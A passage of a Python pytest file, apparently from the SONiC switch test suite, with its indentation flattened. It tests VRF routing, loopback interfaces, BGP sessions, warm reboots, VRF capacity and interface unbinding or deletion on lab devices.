fib_info_files=['/tmp/pc01_neigh_ipv6.txt']
)
def test_redirect_to_new_ports_v4(self, partial_ptf_runner, ptfhost):
# verify that the redirect ports receive the packets
gen_specific_neigh_file(self.c_vars['pc1_v4_neigh_ips'], self.c_vars['redirect_dst_ports'],
'/tmp/redirect_pc01_neigh_ipv4.txt', ptfhost)
partial_ptf_runner(
testname="vrf_test.FwdTest",
src_ports=self.c_vars['src_ports'],
test_balancing=True,
balancing_test_times=1000,
balancing_test_ratio=1.0, # test redirect balancing
fib_info_files=['/tmp/redirect_pc01_neigh_ipv4.txt']
)
def test_redirect_to_new_ports_v6(self, partial_ptf_runner, ptfhost):
# verify that the redirect ports receive the packets
gen_specific_neigh_file(self.c_vars['pc1_v6_neigh_ips'], self.c_vars['redirect_dst_ports'],
'/tmp/redirect_pc01_neigh_ipv6.txt', ptfhost)
partial_ptf_runner(
testname="vrf_test.FwdTest",
src_ports=self.c_vars['src_ports'],
test_balancing=True,
balancing_test_times=1000,
balancing_test_ratio=1.0, # test redirect balancing
fib_info_files=['/tmp/redirect_pc01_neigh_ipv6.txt']
)
class TestVrfLoopbackIntf():
c_vars = {}
announce_prefix = '10.10.10.0/26'
@pytest.fixture(scope="class", autouse=True)
def setup_vrf_loopback(self, duthosts, rand_one_dut_hostname, ptfhost, cfg_facts, tbinfo):
duthost = duthosts[rand_one_dut_hostname]
# -------- Setup ----------
lb0_ip_facts = get_intf_ips('Loopback0', cfg_facts)
vlan1000_ip_facts = get_intf_ips('Vlan1000', cfg_facts)
lb2_ip_facts = get_intf_ips('Loopback2', cfg_facts)
vlan2000_ip_facts = get_intf_ips('Vlan2000', cfg_facts)
self.c_vars['lb0_ip_facts'] = lb0_ip_facts
self.c_vars['lb2_ip_facts'] = lb2_ip_facts
self.c_vars['vlan1000_ip_facts'] = vlan1000_ip_facts
self.c_vars['vlan2000_ip_facts'] = vlan2000_ip_facts
# deploy routes to loopback
for ver, ips in lb0_ip_facts.iteritems():
for vlan_ip in vlan1000_ip_facts[ver]:
nexthop = vlan_ip.ip
break
for ip in ips:
ptfhost.shell("ip netns exec {} ip route add {} nexthop via {} ".format(g_vars['vlan_peer_vrf2ns_map']['Vrf1'], ip, nexthop))
for ver, ips in lb2_ip_facts.iteritems():
for vlan_ip in vlan2000_ip_facts[ver]:
nexthop = vlan_ip.ip
break
for ip in ips:
ptfhost.shell("ip netns exec {} ip route add {} nexthop via {} ".format(g_vars['vlan_peer_vrf2ns_map']['Vrf2'], ip, nexthop))
duthost.shell("sysctl -w net.ipv6.ip_nonlocal_bind=1")
# -------- Testing ----------
yield
# -------- Teardown ----------
# routes on the ptf may be flushed when the vrfs are removed
duthost.shell("sysctl -w net.ipv6.ip_nonlocal_bind=0")
def test_ping_vrf1_loopback(self, ptfhost, duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
for ver, ips in self.c_vars['lb0_ip_facts'].iteritems():
for ip in ips:
if ip.version == 4:
# FIXME Within a vrf, ping(4) currently does not support using
# an ip of a loopback interface as the source (it complains 'Cannot assign
# requested address'). An alternative is to ping the loopback address
# from the ptf
ptfhost.shell("ip netns exec {} ping {} -c 3 -f -W2".format(g_vars['vlan_peer_vrf2ns_map']['Vrf1'], ip.ip))
else:
neigh_ip6 = self.c_vars['vlan1000_ip_facts']['ipv6'][0].ip + 1
duthost.shell("ping6 {} -I Vrf1 -I {} -c 3 -f -W2".format(neigh_ip6, ip.ip))
def test_ping_vrf2_loopback(self, ptfhost, duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
for ver, ips in self.c_vars['lb2_ip_facts'].iteritems():
for ip in ips:
if ip.version == 4:
# FIXME Within a vrf, ping(4) currently does not support using
# an ip of a loopback interface as the source (it complains 'Cannot assign
# requested address'). An alternative is to ping the loopback address
# from the ptf
ptfhost.shell("ip netns exec {} ping {} -c 3 -f -W2".format(g_vars['vlan_peer_vrf2ns_map']['Vrf2'], ip.ip))
else:
neigh_ip6 = self.c_vars['vlan2000_ip_facts']['ipv6'][0].ip + 1
duthost.shell("ping6 {} -I Vrf2 -I {} -c 3 -f -W2".format(neigh_ip6, ip.ip))
@pytest.fixture
def setup_bgp_with_loopback(self, duthosts, rand_one_dut_hostname, ptfhost, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
# ----------- Setup ----------------
# FIXME Create a dummy bgp session.
# Workaround to overcome the bgp socket issue.
# When there are only vrf bgp sessions and
# net.ipv4.tcp_l3mdev_accept=1, bgpd(7.0) does
# not create a bgp socket for the sessions.
duthost.shell("vtysh -c 'config terminal' -c 'router bgp 65444'")
# vrf1 args, vrf2 use the same as vrf1
peer_range = IPNetwork(cfg_facts['BGP_PEER_RANGE']['BGPSLBPassive']['ip_range'][0])
ptf_speaker_ip = IPNetwork("{}/{}".format(peer_range[1], peer_range.prefixlen))
vlan_port = get_vlan_members('Vlan1000', cfg_facts)[0]
vlan_peer_port = cfg_facts['config_port_indices'][vlan_port]
ptf_direct_ip = g_vars['vlan_peer_ips'][('Vrf1', vlan_peer_port)]['ipv4'][0]
# add route to ptf_speaker_ip
for (vrf, vlan_peer_port), ips in g_vars['vlan_peer_ips'].iteritems():
nh = ips['ipv4'][0].ip
duthost.shell("vtysh -c 'configure terminal' -c 'ip route {} {} vrf {}'".format(peer_range, nh , vrf))
duthost.shell("ping {} -I {} -c 3 -f -W2".format(nh, vrf))
# add speaker ips to ptf macvlan ports
for vrf, vlan_peer_port in g_vars['vlan_peer_ips']:
ns = g_vars['vlan_peer_vrf2ns_map'][vrf]
ptfhost.shell("ip netns exec {} ip address add {} dev e{}mv1".format(ns, ptf_speaker_ip, vlan_peer_port))
res = duthost.shell("sonic-cfggen -m -d -y /etc/sonic/constants.yml -v \"constants.deployment_id_asn_map[DEVICE_METADATA['localhost']['deployment_id']]\"")
bgp_speaker_asn = res['stdout']
exabgp_dir = "/root/exabgp"
ptfhost.file(path=exabgp_dir, state="directory")
extra_vars = {
'exabgp_dir': exabgp_dir,
'announce_prefix': self.announce_prefix,
'peer_asn' : cfg_facts['DEVICE_METADATA']['localhost']['bgp_asn'],
'my_asn' : bgp_speaker_asn,
'speaker_ip': ptf_speaker_ip.ip,
'direct_ip' : ptf_direct_ip.ip,
'namespace' : g_vars['vlan_peer_vrf2ns_map'].values(),
'lo_addr' : get_intf_ips('Loopback0', cfg_facts)['ipv4'][0].ip
}
ptfhost.host.options['variable_manager'].extra_vars.update(extra_vars)
ptfhost.template(src="vrf/bgp_speaker/config.j2", dest="%s/%s" % (exabgp_dir, 'config.ini'))
# deploy start script
ptfhost.template(src="vrf/bgp_speaker/start.j2", dest="%s/%s" % (exabgp_dir, 'start.sh'), mode="u+rwx")
# kill exabgp if any
ptfhost.shell("pkill exabgp || true")
# start exabgp instance
ptfhost.shell("bash %s/start.sh" % exabgp_dir)
# ensure exabgp started
ptfhost.shell("pgrep exabgp")
# make sure routes announced to bgp neighbors
time.sleep(10)
# -------- Testing ----------
yield
# -------- Teardown ---------
# del route to ptf_speaker_ip on dut
for (vrf, vlan_peer_port), ips in g_vars['vlan_peer_ips'].iteritems():
duthost.shell("vtysh -c 'configure terminal' -c 'no ip route {} {} vrf {}'".format(peer_range, ips['ipv4'][0], vrf))
# kill exabgp
ptfhost.shell("pkill exabgp || true")
# del speaker ips from ptf ports
for vrf, vlan_peer_port in g_vars['vlan_peer_ips']:
ns = g_vars['vlan_peer_vrf2ns_map'][vrf]
ptfhost.shell("ip netns exec {} ip address del {} dev e{}mv1".format(ns, ptf_speaker_ip, vlan_peer_port))
# FIXME workaround to overcome the bgp socket issue
#duthost.shell("vtysh -c 'config terminal' -c 'no router bgp 65444'")
@pytest.mark.usefixtures('setup_bgp_with_loopback')
def test_bgp_with_loopback(self, duthosts, rand_one_dut_hostname, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
peer_range = IPNetwork(cfg_facts['BGP_PEER_RANGE']['BGPSLBPassive']['ip_range'][0])
ptf_speaker_ip = IPNetwork("{}/{}".format(peer_range[1], peer_range.prefixlen))
for vrf in cfg_facts['VRF']:
bgp_info = json.loads(duthost.shell("vtysh -c 'show bgp vrf {} summary json'".format(vrf))['stdout'])
route_info = duthost.shell("vtysh -c 'show bgp vrf {} ipv4 {}'".format(vrf, self.announce_prefix))
# Verify bgp sessions are established
assert bgp_info['ipv4Unicast']['peers'][str(ptf_speaker_ip.ip)]['state'] == 'Established', \
"Bgp peer {} should be Established!".format(ptf_speaker_ip.ip)
# Verify accepted prefixes of the dynamic neighbors are correct
assert bgp_info['ipv4Unicast']['peers'][str(ptf_speaker_ip.ip)]['pfxRcd'] == 1
class TestVrfWarmReboot():
@pytest.fixture(scope="class", autouse=True)
def setup_vrf_warm_reboot(self, ptfhost, tbinfo):
# -------- Setup ----------
gen_vrf_fib_file('Vrf1', tbinfo, ptfhost,
render_file='/tmp/vrf1_fib.txt',
limited_podset_number=50,
limited_tor_number=16)
# -------- Testing ----------
yield
# -------- Teardown ----------
# FIXME Might need a cold reboot if the test failed?
pass
def test_vrf_swss_warm_reboot(self, duthosts, rand_one_dut_hostname, cfg_facts, partial_ptf_runner):
duthost = duthosts[rand_one_dut_hostname]
# enable swss warm-reboot
duthost.shell("config warm_restart enable swss")
exc_que = Queue.Queue()
params = {
'ptf_runner': partial_ptf_runner,
'exc_queue': exc_que,  # used to store exception info
'testname': 'vrf_test.FibTest',
'fib_info_files': ["/tmp/vrf1_fib.txt"],
'src_ports': g_vars['vrf_member_port_indices']['Vrf1']
}
traffic_in_bg = threading.Thread(target=ex_ptf_runner, kwargs=params)
# send background traffic
traffic_in_bg.start()
logger.info("Start transmiting packets...")
# start swss warm-reboot
duthost.shell("service swss restart")
logger.info("Warm reboot swss...")
# wait until background traffic finished
traffic_in_bg.join()
logger.info("Transmit done.")
passed = True
if exc_que.qsize() != 0:
passed = False
exc_type, exc_obj, exc_trace = exc_que.get()
assert passed == True, "Traffic Test Failed \n {}".format(str(exc_obj))
# wait until components finish reconcile
tbd_comp_list = finalize_warmboot(duthost)
assert len(tbd_comp_list) == 0, \
"Some components didn't finish reconcile: {} ...".format(tbd_comp_list)
# basic check after warm reboot
assert wait_until(300, 20, duthost.critical_services_fully_started), \
"All critical services should fully started!{}".format(duthost.critical_services)
up_ports = [p for p, v in cfg_facts['PORT'].items() if v.get('admin_status', None) == 'up' ]
assert wait_until(300, 20, check_interface_status, duthost, up_ports), \
"All interfaces should be up!"
def test_vrf_system_warm_reboot(self, duthosts, rand_one_dut_hostname, localhost, cfg_facts, partial_ptf_runner):
duthost = duthosts[rand_one_dut_hostname]
exc_que = Queue.Queue()
params = {
'ptf_runner': partial_ptf_runner,
'exc_queue': exc_que,  # used to store exception info
'testname': 'vrf_test.FibTest',
'fib_info_files': ["/tmp/vrf1_fib.txt"],
'src_ports': g_vars['vrf_member_port_indices']['Vrf1']
}
traffic_in_bg = threading.Thread(target=ex_ptf_runner, kwargs=params)
# send background traffic
traffic_in_bg.start()
logger.info("Start transmiting packets...")
# start system warm-reboot
logger.info("Warm reboot ...")
reboot(duthost, localhost, reboot_type="warm")
# wait until background traffic finished
traffic_in_bg.join()
logger.info("Transmit done.")
passed = True
if exc_que.qsize() != 0:
passed = False
exc_type, exc_obj, exc_trace = exc_que.get()
assert passed == True, "Test Failed: \n Exception infos => {}".format(str(exc_obj))
# wait until components finish reconcile
comp_list = ['orchagent', 'neighsyncd', 'bgp']
tbd_comp_list = finalize_warmboot(duthost, comp_list=comp_list)
assert len(tbd_comp_list) == 0, "Some components didn't finish reconcile: {} ...".format(tbd_comp_list)
# basic check after warm reboot
assert wait_until(300, 20, duthost.critical_services_fully_started), "Not all critical services are fully started"
up_ports = [p for p, v in cfg_facts['PORT'].items() if v.get('admin_status', None) == 'up' ]
assert wait_until(300, 20, check_interface_status, duthost, up_ports), "Not all interfaces are up"
class TestVrfCapacity():
VRF_CAPACITY = 1000
# limit the number of vrfs to be covered to limit script execution time
TEST_COUNT = 100
src_base_vid = 2000
dst_base_vid = 3000
ipnet1 = IPNetwork("192.1.1.0/31")
ipnet2 = IPNetwork("192.2.1.0/31")
vrf_name_tpl = "Vrf_cap_{}"
sub_if_name_tpl = "e{}.v{}" # should not include 'eth'
route_prefix = "200.200.200.0/24"
cleanup_method = 'reboot' # reboot or remove
@pytest.fixture(scope="class")
def vrf_count(self, request):
vrf_capacity = request.config.option.vrf_capacity or self.VRF_CAPACITY # get cmd line option value, use default if none
return vrf_capacity - 3 # minus global(default) VRF and Vrf1/Vrf2
@pytest.fixture(scope="class")
def random_vrf_list(self, vrf_count, request):
test_count = request.config.option.vrf_test_count or self.TEST_COUNT # get cmd line option value, use default if none
return sorted(random.sample(xrange(1, vrf_count+1), min(test_count, vrf_count)))
@pytest.fixture(scope="class", autouse=True)
def setup_vrf_capacity(self, duthosts, rand_one_dut_hostname, ptfhost, localhost, cfg_facts, vrf_count, random_vrf_list, request):
"""
Set up $VRF_CAPACITY (minus the global/default VRF and Vrf1/Vrf2) vrfs,
2 vlan interfaces per vrf,
1 ip address per vlan interface,
1 static route per vrf, setting $route_prefix (200.200.200.0/24) with the next hop pointing to vlan_2's neighbor ip,
using the 2nd member port of Vlan1000/2000 as the trunk port.
Example:
VRF        RIFs      Vlan_Member_Port  IP            Neighbor_IP(on PTF)  Static_Route
Vrf_Cap_1  Vlan2001  Ethernet2         192.1.1.0/31  192.1.1.1/31         ip route 200.200.200.0/24 192.2.1.1 vrf Vrf_Cap_1
           Vlan3001  Ethernet14        192.2.1.0/31  192.2.1.1/31
Vrf_Cap_2  Vlan2002  Ethernet2         192.1.1.2/31  192.1.1.3/31         ip route 200.200.200.0/24 192.2.1.3 vrf Vrf_Cap_2
           Vlan3002  Ethernet14        192.2.1.2/31  192.2.1.3/31
...
"""
duthost = duthosts[rand_one_dut_hostname]
# -------- Setup ----------
duthost.shell("logger -p INFO -- '-------- {} start!!! ---------'".format(request.cls.__name__))
# increase ipv4 neigh threshold to 2k
duthost.shell("sysctl -w net.ipv4.neigh.default.gc_thresh3=2048")
# use the 2nd member port of Vlan1000/Vlan2000 as the trunk port
dut_port1 = get_vlan_members('Vlan1000', cfg_facts)[1]
dut_port2 = get_vlan_members('Vlan2000', cfg_facts)[1]
ptf_port1 = g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000'][1]
ptf_port2 = g_vars['vrf_intf_member_port_indices']['Vrf2']['Vlan2000'][1]
# base ip range to be assigned to vlan rif
ip1 = self.ipnet1
ip2 = self.ipnet2
# setup $vrf_count vrfs on dut
dut_extra_vars = {
'vrf_count': vrf_count,
'src_base_vid': self.src_base_vid,
'dst_base_vid': self.dst_base_vid,
'vrf_name_tpl': self.vrf_name_tpl,
'ip1': ip1,
'ip2': ip2,
'dut_port1': dut_port1,
'dut_port2': dut_port2,
'route_prefix': self.route_prefix,
'op_code': 'add'
}
duthost.host.options['variable_manager'].extra_vars.update(dut_extra_vars)
cfg_attrs_map = OrderedDict()
# In the worst case (1k vrfs, 2k rifs), removing a vlan could take 60~80ms
# ("VlanMgr::removeHostVlan ip link del Vlan{{vlan_id}} && bridge vlan del vid {{vlan_id}} dev Bridge self" takes most of the time)
# So wait up to 5(s) + 80(ms) * 2(vlans per vrf) * vrf_count when removing vlans
cfg_attrs_map['vlan'] = {'add_sleep_time': 2, 'remove_sleep_time': 5 + 0.08 * 2 * vrf_count}
# In the worst case (1k vrfs, 2k rifs), removing a vlan member from a vlan could take 160~220ms
# ("vlanmgrd::removeHostVlanMember /sbin/bridge vlan show dev <devname>" takes most of the time)
# So wait up to 5(s) + 220(ms) * 2(2 vlan members per vrf) * vrf_count
cfg_attrs_map['vlan_member'] = {'add_sleep_time': 2, 'remove_sleep_time': 5 + 0.2 * 2 * vrf_count}
# In the worst case (1k vrfs, 2k rifs), removing a vrf could take 6~10ms
# So wait up to 5(s) + 10(ms) * vrf_count when removing vrfs
cfg_attrs_map['vrf'] = {'add_sleep_time': 2, 'remove_sleep_time': 5 + 0.01 * vrf_count}
# In the worst case (1k vrfs, 2k rifs), removing a rif could take 30~40ms
# ("IntfMgr::getIntfIpCount ip address show <alias> master <vrfName>" takes most of the time)
# So wait up to 5(s) + 40(ms) * 2(rifs per vrf) * vrf_count when removing rifs
cfg_attrs_map['vrf_intf'] = {'add_sleep_time': 2, 'remove_sleep_time': 5 + 0.04 * 2 * vrf_count}
cfg_attrs_map['vlan_intf'] = {'add_sleep_time': 2, 'remove_sleep_time': 5}
for cfg_name, attrs in cfg_attrs_map.iteritems():
src_template = 'vrf/vrf_capacity_{}_cfg.j2'.format(cfg_name)
render_file = '/tmp/vrf_capacity_{}_cfg.json'.format(cfg_name)
duthost.template(src=src_template, dest=render_file)
duthost.shell("sonic-cfggen -j {} --write-to-db".format(render_file))
time.sleep(attrs['add_sleep_time'])
# setup static routes
duthost.template(src='vrf/vrf_capacity_route_cfg.j2', dest='/tmp/vrf_capacity_route_cfg.sh', mode="0755")
duthost.shell("/tmp/vrf_capacity_route_cfg.sh")
# setup peer ip addresses on ptf
ptf_extra_vars = {
'vrf_count': vrf_count,
'src_base_vid': self.src_base_vid,
'dst_base_vid': self.dst_base_vid,
'sub_if_name_tpl': self.sub_if_name_tpl,
'ip1': ip1,
'ip2': ip2,
'ptf_port1': ptf_port1,
'ptf_port2': ptf_port2,
'random_vrf_list': random_vrf_list
}
ptfhost.host.options['variable_manager'].extra_vars.update(ptf_extra_vars)
ptfhost.template(src='vrf/vrf_capacity_ptf_cfg.j2', dest='/tmp/vrf_capacity_ptf_cfg.sh', mode="0755")
ptfhost.shell('/tmp/vrf_capacity_ptf_cfg.sh')
# ping to trigger neighbor resolution and also activate the static routes
dut_extra_vars.update({
'random_vrf_list': random_vrf_list,
'count': 1,
'timeout': 1
})
duthost.host.options['variable_manager'].extra_vars.update(dut_extra_vars)
duthost.template(src='vrf/vrf_capacity_ping.j2', dest='/tmp/vrf_capacity_neigh_learning.sh', mode="0755")
duthost.shell('/tmp/vrf_capacity_neigh_learning.sh', module_ignore_errors=True)
# wait for route/neigh entries to be applied to the ASIC
time.sleep(5)
# -------- Testing ----------
yield
# -------- Teardown ----------
# remove cfg on ptf
ptfhost.shell("ip address flush dev eth{}".format(ptf_port1))
ptfhost.shell("ip address flush dev eth{}".format(ptf_port2))
ptfhost.template(src='vrf/vrf_capacity_del_ptf_cfg.j2', dest='/tmp/vrf_capacity_del_ptf_cfg.sh', mode="0755")
ptfhost.shell('/tmp/vrf_capacity_del_ptf_cfg.sh')
duthost.shell("config interface startup {}".format(dut_port1))
duthost.shell("config interface startup {}".format(dut_port2))
# remove cfg on dut
if self.cleanup_method == 'reboot':
reboot(duthost, localhost)
else:
duthost.shell("config interface shutdown {}".format(dut_port1))
duthost.shell("config interface shutdown {}".format(dut_port2))
# flush macs, arps and neighbors
duthost.shell("sonic-clear arp")
duthost.shell("sonic-clear fdb all")
# remove static routes
dut_extra_vars['op_code'] = 'del'
duthost.host.options['variable_manager'].extra_vars.update(dut_extra_vars)
duthost.template(src='vrf/vrf_capacity_route_cfg.j2', dest='/tmp/vrf_capacity_route_cfg.sh', mode="0755")
duthost.shell('/tmp/vrf_capacity_route_cfg.sh')
# remove ip addr, intf, vrf, vlan member, vlan cfgs
for cfg_name, attrs in reversed(cfg_attrs_map.items()):
src_template = 'vrf/vrf_capacity_{}_cfg.j2'.format(cfg_name)
render_file = '/tmp/vrf_capacity_del_{}_cfg.json'.format(cfg_name)
duthost.template(src=src_template, dest=render_file)
duthost.shell("sonic-cfggen -j {} --write-to-db".format(render_file))
time.sleep(attrs['remove_sleep_time'])
duthost.shell("logger -p INFO -- '-------- {} end!!! ---------'".format(request.cls.__name__))
def test_ping(self, duthosts, rand_one_dut_hostname, random_vrf_list):
duthost = duthosts[rand_one_dut_hostname]
dut_extra_vars = {
'vrf_name_tpl': self.vrf_name_tpl,
'random_vrf_list': random_vrf_list,
'ip1': self.ipnet1,
'ip2': self.ipnet2
}
duthost.host.options['variable_manager'].extra_vars.update(dut_extra_vars)
duthost.template(src='vrf/vrf_capacity_ping.j2', dest='/tmp/vrf_capacity_ping.sh', mode="0755")
duthost.shell('/tmp/vrf_capacity_ping.sh')
def test_ip_fwd(self, partial_ptf_runner, random_vrf_list, ptfhost):
ptf_port1 = g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000'][1]
ptf_port2 = g_vars['vrf_intf_member_port_indices']['Vrf2']['Vlan2000'][1]
dst_ips = [str(IPNetwork(self.route_prefix)[1])]
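# Note: with netaddr, IPNetwork(prefix)[1] is the first host address of the prefix,
# e.g. IPNetwork('200.200.200.0/24')[1] == IPAddress('200.200.200.1') (prefix taken from the example in the docstring above).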
gen_specific_neigh_file(dst_ips, [[ptf_port2]], '/tmp/vrf_capability_fwd.txt', ptfhost)
partial_ptf_runner(
testname="vrf_test.CapTest",
src_ports=[ptf_port1],
fib_info_files=['/tmp/vrf_capability_fwd.txt'],
random_vrf_list=random_vrf_list,
src_base_vid=self.src_base_vid,
dst_base_vid=self.dst_base_vid
)
class TestVrfUnbindIntf():
c_vars = {
'rebind_intf': True # rebind interface during teardown stage
}
@pytest.fixture(scope="class", autouse=True)
def setup_vrf_unbindintf(self, duthosts, rand_one_dut_hostname, ptfhost, tbinfo, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
# -------- Setup ----------
duthost.shell("config interface vrf unbind PortChannel0001")
# wait for neigh/route flush
time.sleep(5)
# -------- Testing ----------
yield
# -------- Teardown ----------
if self.c_vars['rebind_intf']:
self.rebind_intf(duthost)
wait_until(120, 10, check_bgp_facts, duthost, cfg_facts)
def rebind_intf(self, duthost):
duthost.shell("config interface vrf bind PortChannel0001 Vrf1")
for ver, ips in g_vars['vrf_intfs']['Vrf1']['PortChannel0001'].items():
for ip in ips:
duthost.shell("config interface ip add PortChannel0001 {}".format(ip))
@pytest.fixture(scope='class')
def setup_vrf_rebind_intf(self, duthosts, rand_one_dut_hostname, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
self.rebind_intf(duthost)
self.c_vars['rebind_intf'] = False # Mark to skip rebind interface during teardown
# check bgp session state after rebind
assert wait_until(120, 10, check_bgp_facts, duthost, cfg_facts), \
"Bgp sessions should be re-estabalished after Portchannel0001 rebind to Vrf"
def test_pc1_ip_addr_flushed(self, duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
ip_addr_show = duthost.shell("ip addr show PortChannel0001")['stdout']
for ver, ips in g_vars['vrf_intfs']['Vrf1']['PortChannel0001'].items():
for ip in ips:
assert str(ip) not in ip_addr_show, "The ip addresses on PortChannel0001 should be flushed after unbind from vrf."
def test_pc1_neigh_flushed(self, duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
# verify ipv4
show_arp = duthost.shell("show arp")['stdout']
assert 'PortChannel0001' not in show_arp, "The arps on PortChannel0001 should be flushed after unbind from vrf."
# FIXME
# IPv6 neighbors do not seem to be flushed by the kernel when IPv6 addresses are removed
# from an interface, so the IPv6 neighbor-flush check below is commented out.
# # verify ipv6
# show_ndp = duthost.shell("show ndp")['stdout']
# assert 'PortChannel0001' not in show_ndp, "The neighbors on PortChannel0001 should be flushed after unbind from vrf."
def test_pc1_neigh_flushed_by_traffic(self, partial_ptf_runner, ptfhost):
pc1_neigh_ips = []
for ver, ips in g_vars['vrf_intfs']['Vrf1']['PortChannel0001'].items():
for ip in ips:
pc1_neigh_ips.append(str(ip.ip+1))
gen_specific_neigh_file(pc1_neigh_ips, [g_vars['vrf_intf_member_port_indices']['Vrf1']['PortChannel0001']],
'/tmp/unbindvrf_neigh_1.txt', ptfhost)
partial_ptf_runner(
testname="vrf_test.FwdTest",
pkt_action='drop',
fib_info_files=['/tmp/unbindvrf_neigh_1.txt'],
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000'],
ipv4=True,
ipv6=False
)
def test_pc1_routes_flushed(self, ptfhost, tbinfo, partial_ptf_runner):
gen_vrf_fib_file('Vrf1', tbinfo, ptfhost,
dst_intfs=['PortChannel0001'],
render_file="/tmp/unbindvrf_fib_1.txt")
# Send packets from downlink to uplink; PortChannel0001 should no longer receive any packets
partial_ptf_runner(
testname="vrf_test.FibTest",
pkt_action='drop',
fib_info_files=["/tmp/unbindvrf_fib_1.txt"],
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000']
)
def test_pc2_neigh(self, partial_ptf_runner, ptfhost):
pc2_neigh_ips = []
for ver, ips in g_vars['vrf_intfs']['Vrf1']['PortChannel0002'].items():
for ip in ips:
pc2_neigh_ips.append(str(ip.ip+1))
gen_specific_neigh_file(pc2_neigh_ips, [g_vars['vrf_intf_member_port_indices']['Vrf1']['PortChannel0002']],
'/tmp/unbindvrf_neigh_2.txt', ptfhost)
partial_ptf_runner(
testname="vrf_test.FwdTest",
pkt_action='fwd',
fib_info_files=['/tmp/unbindvrf_neigh_2.txt'],
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000'],
)
def test_pc2_fib(self, ptfhost, tbinfo, partial_ptf_runner):
gen_vrf_fib_file('Vrf1', tbinfo, ptfhost,
dst_intfs=['PortChannel0002'],
render_file="/tmp/unbindvrf_fib_2.txt")
partial_ptf_runner(
testname="vrf_test.FibTest",
fib_info_files=["/tmp/unbindvrf_fib_2.txt"],
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000']
)
@pytest.mark.usefixtures('setup_vrf_rebind_intf')
def test_pc1_neigh_after_rebind(self, partial_ptf_runner):
partial_ptf_runner(
testname="vrf_test.FwdTest",
pkt_action='fwd',
fib_info_files=['/tmp/unbindvrf_neigh_1.txt'],
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000'],
ipv4=True,
ipv6=False
)
@pytest.mark.usefixtures('setup_vrf_rebind_intf')
def test_vrf1_fib_after_rebind(self, ptfhost, tbinfo, partial_ptf_runner):
gen_vrf_fib_file('Vrf1', tbinfo, ptfhost,
render_file='/tmp/rebindvrf_vrf1_fib.txt')
partial_ptf_runner(
testname="vrf_test.FibTest",
fib_info_files=["/tmp/rebindvrf_vrf1_fib.txt"],
src_ports=g_vars['vrf_member_port_indices']['Vrf1']
)
class TestVrfDeletion():
c_vars = {
'restore_vrf': True
}
def restore_vrf(self, duthost):
duthost.shell("config vrf add Vrf1")
for intf, ip_facts in g_vars['vrf_intfs']['Vrf1'].items():
duthost.shell("config interface vrf bind %s Vrf1" % intf)
for ver, ips in ip_facts.items():
for ip in ips:
duthost.shell("config interface ip add {} {}".format(intf, ip))
@pytest.fixture(scope="class", autouse=True)
def setup_vrf_deletion(self, duthosts, rand_one_dut_hostname, ptfhost, tbinfo, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
# -------- Setup ----------
gen_vrf_fib_file('Vrf1', tbinfo, ptfhost,
render_file="/tmp/vrf1_fib.txt")
gen_vrf_fib_file('Vrf2', tbinfo, ptfhost,
render_file="/tmp/vrf2_fib.txt")
gen_vrf_neigh_file('Vrf1', ptfhost, render_file="/tmp/vrf1_neigh.txt")
gen_vrf_neigh_file('Vrf2', ptfhost, render_file="/tmp/vrf2_neigh.txt")
duthost.shell("config vrf del Vrf1")
# -------- Testing ----------
yield
# -------- Teardown ----------
if self.c_vars['restore_vrf']:
self.restore_vrf(duthost)
wait_until(120, 10, check_bgp_facts, duthost, cfg_facts)
@pytest.fixture(scope='class')
def setup_vrf_restore(self, duthosts, rand_one_dut_hostname, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
self.restore_vrf(duthost)
self.c_vars['restore_vrf'] = False # Mark to skip restore vrf during teardown
# check bgp session state after restore
assert wait_until(120, 10, check_bgp_facts, duthost, cfg_facts), \
"Bgp sessions should be re-estabalished after restore Vrf1"
def test_pc1_ip_addr_flushed(self, duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
show_interfaces = duthost.shell("show ip interfaces")['stdout']
assert 'PortChannel0001' not in show_interfaces, "The ip addr of PortChannel0001 should be flushed after Vrf1 is deleted."
def test_pc2_ip_addr_flushed(self, duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
show_interfaces = duthost.shell("show ip interfaces")['stdout']
assert 'PortChannel0002' not in show_interfaces, "The ip addr of PortChannel0002 should be flushed after Vrf1 is deleted."
def test_vlan1000_ip_addr_flushed(self, duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
show_interfaces = duthost.shell("show ip interfaces")['stdout']
assert 'Vlan1000' not in show_interfaces, "The ip addr of Vlan1000 should be flushed after Vrf1 is deleted."
def test_loopback0_ip_addr_flushed(self, duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
show_interfaces = duthost.shell("show ip interfaces")['stdout']
assert 'Loopback0' not in show_interfaces, "The ip addr of Loopback0 should be flushed after Vrf1 is deleted."
def test_vrf1_neighs_flushed(self, duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
ip_neigh_show = duthost.shell("ip neigh show vrf Vrf1", module_ignore_errors=True)['stdout']
assert '' == ip_neigh_show, "The neighbors on Vrf1 should be flushed after Vrf1 is deleted."
def test_vrf1_neighs_flushed_by_traffic(self, partial_ptf_runner):
partial_ptf_runner(
testname="vrf_test.FwdTest",
pkt_action='drop',
fib_info_files=["/tmp/vrf1_neigh.txt"],
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000']
)
def test_vrf1_routes_flushed(self, partial_ptf_runner):
partial_ptf_runner(
testname="vrf_test.FibTest",
pkt_action='drop',
fib_info_files=["/tmp/vrf1_fib.txt"],
